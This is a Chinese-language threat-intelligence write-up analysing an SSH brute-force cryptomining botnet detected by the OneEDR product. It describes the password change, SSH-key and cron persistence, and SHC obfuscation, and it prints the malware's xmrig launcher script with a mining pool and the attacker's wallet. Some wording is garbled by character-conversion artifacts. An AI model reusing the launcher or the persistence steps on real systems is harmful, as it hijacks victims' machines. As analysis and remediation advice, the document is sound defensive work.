1 前言
在一個恬靜的午後,微步情報局捕獲一起僵屍網絡攻擊活動。此次攻擊始于微步線上主機威脅檢測與響應平台 OneEDR (下文簡稱 OneEDR )監測到xmirg 的木馬程序告警資訊,微步情報局的安全研究員第一時間針對此項告警展開詳細技術分析。
根據檔案名稱,研究人員将本次涉事惡意木馬判定為與挖礦相關的木馬。該木馬使用了 SHC 加密來躲避安全軟體的檢測。SHC 是一個可以把 shell 腳本混淆加密打包成二進制檔案的工具,該靜态檔案檢視二進制檔案中幾乎沒有看見 shell 腳本的特征。根據本次攻擊事件可以發現,目前有不少黑客通過第三方工具對木馬加密,進而躲過安全軟體的檢測。
2 告警排查分析
2.1告警詳情分析
點選主機詳情,發現有多個可疑下載下傳以及檔案路徑異常。
點選其中一種可疑告警資訊檢視詳情,發現主機從 https://cn.nosdir.me 下載下傳了一個壓縮封包件 mint_xmr.tar.gz。
繼續往下檢視告警資訊, OneEDR 告警資訊為 UPX 的後門檔案,這裡直接可以看出檔案的位置以及隐藏的檔案路徑。
OneEDR 告警提示主機在非登入狀态下有修改密碼的操作,将使用者 CentOS 原有的密碼 “123456” 修改為 “XIq8I4rj5m1YOLZv”。
接着,檢視日志發現,木馬會對可疑下載下傳的壓縮包 mint_xmr.tar.gz 進行自動解壓,給 start、test、updat3、xmrig 檔案賦予執行權限。木馬隻執行了start (母體)檔案,其餘的子檔案由 start 檔案調用執行。
檢視受害機的計劃任務,發現有3個可疑的計劃任務:第一個是每天00:00執行樣本 /var/tmp/.mint-xmr/start ;第二個是每當重新開機就執行樣本 /var/tmp/.mint-xmr/updat3;第三個是每個月第一天的 00:00 執行 /var/tmp/.mint-xmr/updat3 樣本。
2.2 攻擊原因排查
登入受害主機檢視 CentOS 使用者日志檔案,發現存在大量爆破登入 SSH 的行為。日志檔案還記錄了10月10日17:12成功登入 CentOS 賬戶的資訊,登入時間與 OneEDR 告警資訊的木馬下載下傳的時間相近,且都是 CentOS 賬戶。
#cat /var/log/secure |grep centos
根據 OneEDR 檢測到的路徑,在隐藏檔案夾 /var/tmp/.mint-xmr/ 下檢視所有檔案:
#crontab -l
檢視受害機的定時任務,發現存在3個定時任務:分别是每天00:00執行 /var/tmp/.mint-xmr/start;每次重新開機以及每個月的第一天的00:00執行 /var/tmp/.mint-xmr/updat3,并以背景運作的方式運作并對其輸出進行重定向。
3 樣本分析
根據 OneEDR 上面告警資訊提示,受害主機首先運作了 start(986afc16d01d2c5c03022dc74433214a),是以先對其進行分析。
擷取目前使用者 uid 權限 (uid=1000, 3e8既是1000的16進制):
擷取目前路徑:
根據分析到的提示資訊 “has expired!\n please contact your provider [email protected]” 可以關聯出,這個樣本是一個經過加密編譯的 shell 腳本(工具 https://github.com/neurobin/shc)。
接着會調用 updat3,利用 # cat /var/tmp/.logs/.xmr 指令定位到放馬的檔案夾,通過判定目前使用者的 id 是否為0,解鎖檔案夾 /root/.ssh裡面的所有東西,緊接着就是寫入黑客的 SSH 密鑰,賦予 authorized_keys 600 權限,寫入3個定時任務,删掉挖礦配置檔案 config.json ,殺掉原有的挖礦程序(根據這裡也可以判定這是一個 shell 腳本)。
緊接着分析 test 檔案,發現它會調用同目錄下的 xmrig 檔案開始挖礦。xmrig是一個挖礦木馬,需要特定的錢包位址才可以啟動,那麼便可以推斷出 test 主要功能就是通過指定錢包位址啟動 xmrig 進行挖礦。
#!/bin/bash
if ! pgrep -x xmrig > /dev/null;
then ./xmrig -o pool.supportxmr.com:443 -u 86YdB5PXqUfLZXjDHniAv6DoFbZQXX55G9ixQJbz1t6wbttmqsKkfQNXMsg8uxz5jR6KL5EF9RRbZTxAd6PUc1g5Qkjpeeg -k --tls -p x
fi./test 這裡利用上面提到的 SHC 混淆加密編譯工具,簡單測試一段輸出 “helloword”的代碼,判斷是否與木馬檔案采用的混淆加密編譯手法類似。
測試代碼如下:
加密編譯 hello.sh 為 ELF 檔案。
#shc -r -v -f hello.sh
經過對比分析發現與 Start 代碼相似程度極高。
研究人員在分析這個樣本時,并沒有發現木馬本身具有密碼爆破功能。當成功登入受害主機後就會下載下傳木馬,同時黑客也是“出于好心”随手幫你修改了密碼。在面對這種加密的 shell 可以用 unshc、gdb 工具以及 strace、ps -ef 等指令進行分析。
這裡以 gdb 工具為例對 start 進行分析,先用 gdb 載入 start 下好斷點,利用指令 grep heap /proc/pid/maps 檢視木馬程序的虛拟空間布局,接着把相關資料 dump下來。
經過删除一些無關的垃圾資訊後,它的 shell 腳本代碼如下:
4 總結與思考
4.1 事件總結
本次事件是在 OneEDR 在收集終端的程序、網絡、檔案等系統行為發現的, OneEDR 是一款專注于主機入侵檢測的新型終端防護平台,通過利用威脅情報、行為分析、智能事件聚合、機器學習等技術手段,實作對主機入侵的精準發現,發現已知與未知的威脅。
充分利用 ATT&CK 對攻擊全鍊路進行多點布控,全面發現入侵行為的蛛絲馬迹;通過 OneEDR 的智能關聯功能,可了解到安全事件的上下文以及主機、賬号、程序等資訊,通過“程序鍊”快速掌握事件的影響範圍以及事件的概括,進而精準溯源。
4.2 事件思考
1、随着近幾年5G物聯網的迅速發展,物聯網裝置數量呈幾何增長,物聯網裝置已經成為主要的攻擊目标。
2、随着物聯網裝置的不斷增多,使用 SSH 暴力破解攻擊會也越來越多,這會讓僵屍網絡迅速增加自己的 bot ;與此同時,黑客租用的是國外匿名廉價的 VPS,它不但成本低,而且溯源難度較高,是以,以後僵屍網絡隻會越來越多。
3、目前的 IOT 僵屍網絡以 DDoS 和 挖礦的木馬為主。
4.3 處置建議
1、Kill 程序 /var/tmp/.mint-xmr/updat3 、/var/tmp/.mint-xmr/start;
2、删除 /var/tmp/.mint-xmr/、/var/tmp/.logs/ 相關檔案;
3、清除計劃任務裡的 /var/tmp/.mint-xmr/ 相關計劃任務;
4、SSH 使用安全的密碼政策,使用高強度密碼,切勿使用弱密碼,防止黑客暴力破解。